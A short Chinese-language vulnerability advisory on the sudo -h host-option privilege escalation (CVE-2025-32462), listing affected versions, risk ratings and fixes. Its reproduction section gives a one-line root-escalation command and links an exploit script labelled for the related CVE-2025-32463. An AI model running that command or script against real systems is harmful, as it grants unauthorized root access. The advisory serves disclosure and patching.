跳转至

Linux sudo host 权限提升漏洞(CVE-2025-32462)

Linux sudo host 权限提升漏洞(CVE-2025-32462)源于 sudo 的 -h(--host)选项错误应用远程主机规则到本地,攻击者可绕过权限提升至root并执行任意代码

影响版本

1.9.0 <= sudo <= 1.9.17

1.8.8 <= sudo <= 1.8.32

漏洞状态

漏洞细节 漏洞POC 漏洞EXP 在野利用
已公开 已公开 已知

风险等级

维度 评价
威胁等级 高危
影响面 广
攻击者价值
利用难度

漏洞复现

FOFA:CVE-2025-32462

POC/EXP:

sudo -i -h 远程主机ip

image-20250703133823589

POC/EXP:CVE-2025-32463脚本使用开源https://github.com/pr0v3rbs/CVE-2025-32463

脚本使用开源https://github.com/pr0v3rbs/CVE-2025-32463

image-20250703133955632

snort规则:无法提供


漏洞修复

关闭互联网暴露面或接口设置访问权限

升级至安全版本。